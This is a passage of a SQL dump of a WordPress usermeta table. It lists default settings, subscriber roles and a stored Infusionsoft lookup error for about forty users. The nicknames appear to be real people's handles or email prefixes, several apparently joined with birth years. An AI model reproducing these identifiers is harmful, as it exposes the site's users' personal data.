(10346, 787, 'show_admin_bar_front', 'true'),
(10347, 787, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10348, 787, 'cyb_user_level', '0'),
(10349, 787, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10350, 787, 'default_password_nag', '1'),
(10351, 788, 'nickname', 'jpy21021975'),
(10352, 788, 'first_name', ''),
(10353, 788, 'last_name', ''),
(10354, 788, 'description', ''),
(10355, 788, 'rich_editing', 'true'),
(10356, 788, 'comment_shortcuts', 'false'),
(10357, 788, 'admin_color', 'fresh'),
(10358, 788, 'use_ssl', '0'),
(10359, 788, 'show_admin_bar_front', 'true'),
(10360, 788, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10361, 788, 'cyb_user_level', '0'),
(10362, 788, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10363, 788, 'default_password_nag', '1'),
(10364, 789, 'nickname', 'sweeteebls2003'),
(10365, 789, 'first_name', ''),
(10366, 789, 'last_name', ''),
(10367, 789, 'description', ''),
(10368, 789, 'rich_editing', 'true'),
(10369, 789, 'comment_shortcuts', 'false'),
(10370, 789, 'admin_color', 'fresh'),
(10371, 789, 'use_ssl', '0'),
(10372, 789, 'show_admin_bar_front', 'true'),
(10373, 789, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10374, 789, 'cyb_user_level', '0'),
(10375, 789, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10376, 789, 'default_password_nag', '1'),
(10377, 790, 'nickname', 'auboriths1956'),
(10378, 790, 'first_name', ''),
(10379, 790, 'last_name', ''),
(10380, 790, 'description', ''),
(10381, 790, 'rich_editing', 'true'),
(10382, 790, 'comment_shortcuts', 'false'),
(10383, 790, 'admin_color', 'fresh'),
(10384, 790, 'use_ssl', '0'),
(10385, 790, 'show_admin_bar_front', 'true'),
(10386, 790, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10387, 790, 'cyb_user_level', '0'),
(10388, 790, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10389, 790, 'default_password_nag', '1'),
(10390, 791, 'nickname', 'gwolynesjr1972'),
(10391, 791, 'first_name', ''),
(10392, 791, 'last_name', ''),
(10393, 791, 'description', ''),
(10394, 791, 'rich_editing', 'true'),
(10395, 791, 'comment_shortcuts', 'false'),
(10396, 791, 'admin_color', 'fresh'),
(10397, 791, 'use_ssl', '0'),
(10398, 791, 'show_admin_bar_front', 'true'),
(10399, 791, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10400, 791, 'cyb_user_level', '0'),
(10401, 791, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10402, 791, 'default_password_nag', '1'),
(10403, 792, 'nickname', 'kevinorr621974'),
(10404, 792, 'first_name', ''),
(10405, 792, 'last_name', ''),
(10406, 792, 'description', ''),
(10407, 792, 'rich_editing', 'true'),
(10408, 792, 'comment_shortcuts', 'false'),
(10409, 792, 'admin_color', 'fresh'),
(10410, 792, 'use_ssl', '0'),
(10411, 792, 'show_admin_bar_front', 'true'),
(10412, 792, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10413, 792, 'cyb_user_level', '0'),
(10414, 792, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10415, 792, 'default_password_nag', '1'),
(10416, 793, 'nickname', 'ervib21985'),
(10417, 793, 'first_name', ''),
(10418, 793, 'last_name', ''),
(10419, 793, 'description', ''),
(10420, 793, 'rich_editing', 'true'),
(10421, 793, 'comment_shortcuts', 'false'),
(10422, 793, 'admin_color', 'fresh'),
(10423, 793, 'use_ssl', '0'),
(10424, 793, 'show_admin_bar_front', 'true'),
(10425, 793, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10426, 793, 'cyb_user_level', '0'),
(10427, 793, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10428, 793, 'default_password_nag', '1'),
(10429, 794, 'nickname', 'nsherazee1963'),
(10430, 794, 'first_name', ''),
(10431, 794, 'last_name', ''),
(10432, 794, 'description', ''),
(10433, 794, 'rich_editing', 'true'),
(10434, 794, 'comment_shortcuts', 'false'),
(10435, 794, 'admin_color', 'fresh'),
(10436, 794, 'use_ssl', '0'),
(10437, 794, 'show_admin_bar_front', 'true'),
(10438, 794, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10439, 794, 'cyb_user_level', '0'),
(10440, 794, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10441, 794, 'default_password_nag', '1'),
(10442, 795, 'nickname', 'usmcnate1967'),
(10443, 795, 'first_name', ''),
(10444, 795, 'last_name', ''),
(10445, 795, 'description', ''),
(10446, 795, 'rich_editing', 'true'),
(10447, 795, 'comment_shortcuts', 'false'),
(10448, 795, 'admin_color', 'fresh'),
(10449, 795, 'use_ssl', '0'),
(10450, 795, 'show_admin_bar_front', 'true'),
(10451, 795, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10452, 795, 'cyb_user_level', '0'),
(10453, 795, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10454, 795, 'default_password_nag', '1'),
(10455, 796, 'nickname', 'scottpatrickschmitt1961'),
(10456, 796, 'first_name', ''),
(10457, 796, 'last_name', ''),
(10458, 796, 'description', ''),
(10459, 796, 'rich_editing', 'true'),
(10460, 796, 'comment_shortcuts', 'false'),
(10461, 796, 'admin_color', 'fresh'),
(10462, 796, 'use_ssl', '0'),
(10463, 796, 'show_admin_bar_front', 'true'),
(10464, 796, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10465, 796, 'cyb_user_level', '0'),
(10466, 796, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10467, 796, 'default_password_nag', '1'),
(10468, 797, 'nickname', 'lealriggs1961'),
(10469, 797, 'first_name', ''),
(10470, 797, 'last_name', ''),
(10471, 797, 'description', ''),
(10472, 797, 'rich_editing', 'true'),
(10473, 797, 'comment_shortcuts', 'false'),
(10474, 797, 'admin_color', 'fresh'),
(10475, 797, 'use_ssl', '0'),
(10476, 797, 'show_admin_bar_front', 'true'),
(10477, 797, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10478, 797, 'cyb_user_level', '0'),
(10479, 797, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10480, 797, 'default_password_nag', '1'),
(10481, 798, 'nickname', 'sherazeeh1956'),
(10482, 798, 'first_name', ''),
(10483, 798, 'last_name', ''),
(10484, 798, 'description', ''),
(10485, 798, 'rich_editing', 'true'),
(10486, 798, 'comment_shortcuts', 'false'),
(10487, 798, 'admin_color', 'fresh'),
(10488, 798, 'use_ssl', '0'),
(10489, 798, 'show_admin_bar_front', 'true'),
(10490, 798, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10491, 798, 'cyb_user_level', '0'),
(10492, 798, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10493, 798, 'default_password_nag', '1'),
(10494, 799, 'nickname', 'roydjohnson231950'),
(10495, 799, 'first_name', ''),
(10496, 799, 'last_name', ''),
(10497, 799, 'description', ''),
(10498, 799, 'rich_editing', 'true'),
(10499, 799, 'comment_shortcuts', 'false'),
(10500, 799, 'admin_color', 'fresh'),
(10501, 799, 'use_ssl', '0'),
(10502, 799, 'show_admin_bar_front', 'true'),
(10503, 799, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10504, 799, 'cyb_user_level', '0'),
(10505, 799, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10506, 799, 'default_password_nag', '1'),
(10507, 800, 'nickname', 'njkol801970'),
(10508, 800, 'first_name', ''),
(10509, 800, 'last_name', ''),
(10510, 800, 'description', ''),
(10511, 800, 'rich_editing', 'true'),
(10512, 800, 'comment_shortcuts', 'false'),
(10513, 800, 'admin_color', 'fresh'),
(10514, 800, 'use_ssl', '0'),
(10515, 800, 'show_admin_bar_front', 'true'),
(10516, 800, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10517, 800, 'cyb_user_level', '0'),
(10518, 800, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10519, 800, 'default_password_nag', '1'),
(10520, 801, 'nickname', 'artur.ambarcumian1975'),
(10521, 801, 'first_name', ''),
(10522, 801, 'last_name', ''),
(10523, 801, 'description', ''),
(10524, 801, 'rich_editing', 'true'),
(10525, 801, 'comment_shortcuts', 'false'),
(10526, 801, 'admin_color', 'fresh'),
(10527, 801, 'use_ssl', '0'),
(10528, 801, 'show_admin_bar_front', 'true'),
(10529, 801, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10530, 801, 'cyb_user_level', '0'),
(10531, 801, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10532, 801, 'default_password_nag', '1'),
(10533, 802, 'nickname', 'faithmelodyfarmer1957'),
(10534, 802, 'first_name', ''),
(10535, 802, 'last_name', ''),
(10536, 802, 'description', ''),
(10537, 802, 'rich_editing', 'true'),
(10538, 802, 'comment_shortcuts', 'false'),
(10539, 802, 'admin_color', 'fresh'),
(10540, 802, 'use_ssl', '0'),
(10541, 802, 'show_admin_bar_front', 'true'),
(10542, 802, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10543, 802, 'cyb_user_level', '0'),
(10544, 802, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10545, 802, 'default_password_nag', '1'),
(10546, 803, 'nickname', 'benrobertsmusic1968'),
(10547, 803, 'first_name', ''),
(10548, 803, 'last_name', ''),
(10549, 803, 'description', ''),
(10550, 803, 'rich_editing', 'true'),
(10551, 803, 'comment_shortcuts', 'false'),
(10552, 803, 'admin_color', 'fresh'),
(10553, 803, 'use_ssl', '0'),
(10554, 803, 'show_admin_bar_front', 'true'),
(10555, 803, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10556, 803, 'cyb_user_level', '0'),
(10557, 803, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10558, 803, 'default_password_nag', '1'),
(10559, 804, 'nickname', 'ckyte1981'),
(10560, 804, 'first_name', ''),
(10561, 804, 'last_name', ''),
(10562, 804, 'description', ''),
(10563, 804, 'rich_editing', 'true'),
(10564, 804, 'comment_shortcuts', 'false'),
(10565, 804, 'admin_color', 'fresh'),
(10566, 804, 'use_ssl', '0'),
(10567, 804, 'show_admin_bar_front', 'true'),
(10568, 804, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10569, 804, 'cyb_user_level', '0'),
(10570, 804, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10571, 804, 'default_password_nag', '1'),
(10572, 805, 'nickname', 'eng_shahir1962'),
(10573, 805, 'first_name', ''),
(10574, 805, 'last_name', ''),
(10575, 805, 'description', ''),
(10576, 805, 'rich_editing', 'true'),
(10577, 805, 'comment_shortcuts', 'false'),
(10578, 805, 'admin_color', 'fresh'),
(10579, 805, 'use_ssl', '0'),
(10580, 805, 'show_admin_bar_front', 'true'),
(10581, 805, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10582, 805, 'cyb_user_level', '0'),
(10583, 805, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10584, 805, 'default_password_nag', '1'),
(10585, 806, 'nickname', 'djwolf161954'),
(10586, 806, 'first_name', ''),
(10587, 806, 'last_name', ''),
(10588, 806, 'description', ''),
(10589, 806, 'rich_editing', 'true'),
(10590, 806, 'comment_shortcuts', 'false'),
(10591, 806, 'admin_color', 'fresh'),
(10592, 806, 'use_ssl', '0'),
(10593, 806, 'show_admin_bar_front', 'true'),
(10594, 806, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10595, 806, 'cyb_user_level', '0'),
(10596, 806, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10597, 806, 'default_password_nag', '1'),
(10598, 807, 'nickname', 'max1973'),
(10599, 807, 'first_name', ''),
(10600, 807, 'last_name', ''),
(10601, 807, 'description', ''),
(10602, 807, 'rich_editing', 'true'),
(10603, 807, 'comment_shortcuts', 'false'),
(10604, 807, 'admin_color', 'fresh'),
(10605, 807, 'use_ssl', '0'),
(10606, 807, 'show_admin_bar_front', 'true'),
(10607, 807, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10608, 807, 'cyb_user_level', '0'),
(10609, 807, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10610, 807, 'default_password_nag', '1'),
(10611, 808, 'nickname', 'lpope1970'),
(10612, 808, 'first_name', ''),
(10613, 808, 'last_name', ''),
(10614, 808, 'description', ''),
(10615, 808, 'rich_editing', 'true'),
(10616, 808, 'comment_shortcuts', 'false'),
(10617, 808, 'admin_color', 'fresh'),
(10618, 808, 'use_ssl', '0'),
(10619, 808, 'show_admin_bar_front', 'true'),
(10620, 808, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10621, 808, 'cyb_user_level', '0'),
(10622, 808, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10623, 808, 'default_password_nag', '1'),
(10624, 809, 'nickname', 'aklockridge2000'),
(10625, 809, 'first_name', ''),
(10626, 809, 'last_name', ''),
(10627, 809, 'description', ''),
(10628, 809, 'rich_editing', 'true'),
(10629, 809, 'comment_shortcuts', 'false'),
(10630, 809, 'admin_color', 'fresh'),
(10631, 809, 'use_ssl', '0'),
(10632, 809, 'show_admin_bar_front', 'true'),
(10633, 809, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10634, 809, 'cyb_user_level', '0'),
(10635, 809, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10636, 809, 'default_password_nag', '1'),
(10637, 810, 'nickname', 'rachel.m.hennessey1994'),
(10638, 810, 'first_name', ''),
(10639, 810, 'last_name', ''),
(10640, 810, 'description', ''),
(10641, 810, 'rich_editing', 'true'),
(10642, 810, 'comment_shortcuts', 'false'),
(10643, 810, 'admin_color', 'fresh'),
(10644, 810, 'use_ssl', '0'),
(10645, 810, 'show_admin_bar_front', 'true'),
(10646, 810, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10647, 810, 'cyb_user_level', '0'),
(10648, 810, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10649, 810, 'default_password_nag', '1'),
(10650, 811, 'nickname', 'info1959'),
(10651, 811, 'first_name', ''),
(10652, 811, 'last_name', ''),
(10653, 811, 'description', ''),
(10654, 811, 'rich_editing', 'true'),
(10655, 811, 'comment_shortcuts', 'false'),
(10656, 811, 'admin_color', 'fresh'),
(10657, 811, 'use_ssl', '0'),
(10658, 811, 'show_admin_bar_front', 'true'),
(10659, 811, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10660, 811, 'cyb_user_level', '0'),
(10661, 811, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10662, 811, 'default_password_nag', '1'),
(10663, 812, 'nickname', 'tripnipta1981'),
(10664, 812, 'first_name', ''),
(10665, 812, 'last_name', ''),
(10666, 812, 'description', ''),
(10667, 812, 'rich_editing', 'true'),
(10668, 812, 'comment_shortcuts', 'false'),
(10669, 812, 'admin_color', 'fresh'),
(10670, 812, 'use_ssl', '0'),
(10671, 812, 'show_admin_bar_front', 'true'),
(10672, 812, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10673, 812, 'cyb_user_level', '0'),
(10674, 812, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10675, 812, 'default_password_nag', '1'),
(10676, 813, 'nickname', 'bovedino1993'),
(10677, 813, 'first_name', ''),
(10678, 813, 'last_name', ''),
(10679, 813, 'description', ''),
(10680, 813, 'rich_editing', 'true'),
(10681, 813, 'comment_shortcuts', 'false'),
(10682, 813, 'admin_color', 'fresh'),
(10683, 813, 'use_ssl', '0'),
(10684, 813, 'show_admin_bar_front', 'true'),
(10685, 813, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10686, 813, 'cyb_user_level', '0'),
(10687, 813, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10688, 813, 'default_password_nag', '1'),
(10689, 814, 'nickname', 'cbiggs1966'),
(10690, 814, 'first_name', ''),
(10691, 814, 'last_name', ''),
(10692, 814, 'description', ''),
(10693, 814, 'rich_editing', 'true'),
(10694, 814, 'comment_shortcuts', 'false'),
(10695, 814, 'admin_color', 'fresh'),
(10696, 814, 'use_ssl', '0'),
(10697, 814, 'show_admin_bar_front', 'true'),
(10698, 814, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10699, 814, 'cyb_user_level', '0'),
(10700, 814, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10701, 814, 'default_password_nag', '1'),
(10702, 815, 'nickname', 'da.oaks1977'),
(10703, 815, 'first_name', ''),
(10704, 815, 'last_name', ''),
(10705, 815, 'description', ''),
(10706, 815, 'rich_editing', 'true'),
(10707, 815, 'comment_shortcuts', 'false'),
(10708, 815, 'admin_color', 'fresh'),
(10709, 815, 'use_ssl', '0'),
(10710, 815, 'show_admin_bar_front', 'true'),
(10711, 815, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10712, 815, 'cyb_user_level', '0'),
(10713, 815, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10714, 815, 'default_password_nag', '1'),
(10715, 816, 'nickname', 'rytis.seskaitis1963'),
(10716, 816, 'first_name', ''),
(10717, 816, 'last_name', ''),
(10718, 816, 'description', ''),
(10719, 816, 'rich_editing', 'true'),
(10720, 816, 'comment_shortcuts', 'false'),
(10721, 816, 'admin_color', 'fresh'),
(10722, 816, 'use_ssl', '0'),
(10723, 816, 'show_admin_bar_front', 'true'),
(10724, 816, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10725, 816, 'cyb_user_level', '0'),
(10726, 816, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10727, 816, 'default_password_nag', '1'),
(10728, 817, 'nickname', 'mzepp20021963'),
(10729, 817, 'first_name', ''),
(10730, 817, 'last_name', ''),
(10731, 817, 'description', ''),
(10732, 817, 'rich_editing', 'true'),
(10733, 817, 'comment_shortcuts', 'false'),
(10734, 817, 'admin_color', 'fresh'),
(10735, 817, 'use_ssl', '0'),
(10736, 817, 'show_admin_bar_front', 'true'),
(10737, 817, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10738, 817, 'cyb_user_level', '0'),
(10739, 817, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10740, 817, 'default_password_nag', '1'),
(10741, 818, 'nickname', 'zmsqnfl1995'),
(10742, 818, 'first_name', ''),
(10743, 818, 'last_name', ''),
(10744, 818, 'description', ''),
(10745, 818, 'rich_editing', 'true'),
(10746, 818, 'comment_shortcuts', 'false'),
(10747, 818, 'admin_color', 'fresh'),
(10748, 818, 'use_ssl', '0'),
(10749, 818, 'show_admin_bar_front', 'true'),
(10750, 818, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10751, 818, 'cyb_user_level', '0'),
(10752, 818, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10753, 818, 'default_password_nag', '1'),
(10754, 819, 'nickname', 'pamtarasco1988'),
(10755, 819, 'first_name', ''),
(10756, 819, 'last_name', ''),
(10757, 819, 'description', ''),
(10758, 819, 'rich_editing', 'true'),
(10759, 819, 'comment_shortcuts', 'false'),
(10760, 819, 'admin_color', 'fresh'),
(10761, 819, 'use_ssl', '0'),
(10762, 819, 'show_admin_bar_front', 'true'),
(10763, 819, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10764, 819, 'cyb_user_level', '0'),
(10765, 819, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10766, 819, 'default_password_nag', '1'),
(10767, 820, 'nickname', 'dongera2000'),
(10768, 820, 'first_name', ''),
(10769, 820, 'last_name', ''),
(10770, 820, 'description', ''),
(10771, 820, 'rich_editing', 'true'),
(10772, 820, 'comment_shortcuts', 'false'),
(10773, 820, 'admin_color', 'fresh'),
(10774, 820, 'use_ssl', '0'),
(10775, 820, 'show_admin_bar_front', 'true'),
(10776, 820, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10777, 820, 'cyb_user_level', '0'),
(10778, 820, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10779, 820, 'default_password_nag', '1'),
(10780, 821, 'nickname', 'libacili1964'),
(10781, 821, 'first_name', ''),
(10782, 821, 'last_name', ''),
(10783, 821, 'description', ''),
(10784, 821, 'rich_editing', 'true'),
(10785, 821, 'comment_shortcuts', 'false'),
(10786, 821, 'admin_color', 'fresh'),
(10787, 821, 'use_ssl', '0'),
(10788, 821, 'show_admin_bar_front', 'true'),
(10789, 821, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10790, 821, 'cyb_user_level', '0'),
(10791, 821, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10792, 821, 'default_password_nag', '1'),
(10793, 822, 'nickname', 'andrew.paul-moore1991'),
(10794, 822, 'first_name', ''),
(10795, 822, 'last_name', ''),
(10796, 822, 'description', ''),
(10797, 822, 'rich_editing', 'true'),
(10798, 822, 'comment_shortcuts', 'false'),
(10799, 822, 'admin_color', 'fresh'),
(10800, 822, 'use_ssl', '0'),
(10801, 822, 'show_admin_bar_front', 'true'),
(10802, 822, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10803, 822, 'cyb_user_level', '0'),
(10804, 822, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10805, 822, 'default_password_nag', '1'),
(10806, 823, 'nickname', 'peterhalliburton1994'),
(10807, 823, 'first_name', ''),
(10808, 823, 'last_name', ''),
(10809, 823, 'description', ''),
(10810, 823, 'rich_editing', 'true'),
(10811, 823, 'comment_shortcuts', 'false'),
(10812, 823, 'admin_color', 'fresh'),
(10813, 823, 'use_ssl', '0'),
(10814, 823, 'show_admin_bar_front', 'true'),
(10815, 823, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10816, 823, 'cyb_user_level', '0'),
(10817, 823, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10818, 823, 'default_password_nag', '1'),
(10819, 824, 'nickname', 'lililo661996'),
(10820, 824, 'first_name', ''),
(10821, 824, 'last_name', ''),
(10822, 824, 'description', ''),
(10823, 824, 'rich_editing', 'true'),
(10824, 824, 'comment_shortcuts', 'false'),
(10825, 824, 'admin_color', 'fresh'),
(10826, 824, 'use_ssl', '0'),
(10827, 824, 'show_admin_bar_front', 'true'),
(10828, 824, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10829, 824, 'cyb_user_level', '0'),
(10830, 824, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10831, 824, 'default_password_nag', '1'),
(10832, 825, 'nickname', 'ccah69161964'),
(10833, 825, 'first_name', ''),
(10834, 825, 'last_name', ''),
(10835, 825, 'description', ''),
(10836, 825, 'rich_editing', 'true'),
(10837, 825, 'comment_shortcuts', 'false'),
(10838, 825, 'admin_color', 'fresh'),
(10839, 825, 'use_ssl', '0'),
(10840, 825, 'show_admin_bar_front', 'true'),
(10841, 825, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10842, 825, 'cyb_user_level', '0'),
(10843, 825, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10844, 825, 'default_password_nag', '1'),
(10845, 826, 'nickname', 'james12001954'),
(10846, 826, 'first_name', ''),
(10847, 826, 'last_name', ''),
(10848, 826, 'description', ''),
(10849, 826, 'rich_editing', 'true'),
(10850, 826, 'comment_shortcuts', 'false'),
(10851, 826, 'admin_color', 'fresh'),
(10852, 826, 'use_ssl', '0'),
(10853, 826, 'show_admin_bar_front', 'true'),
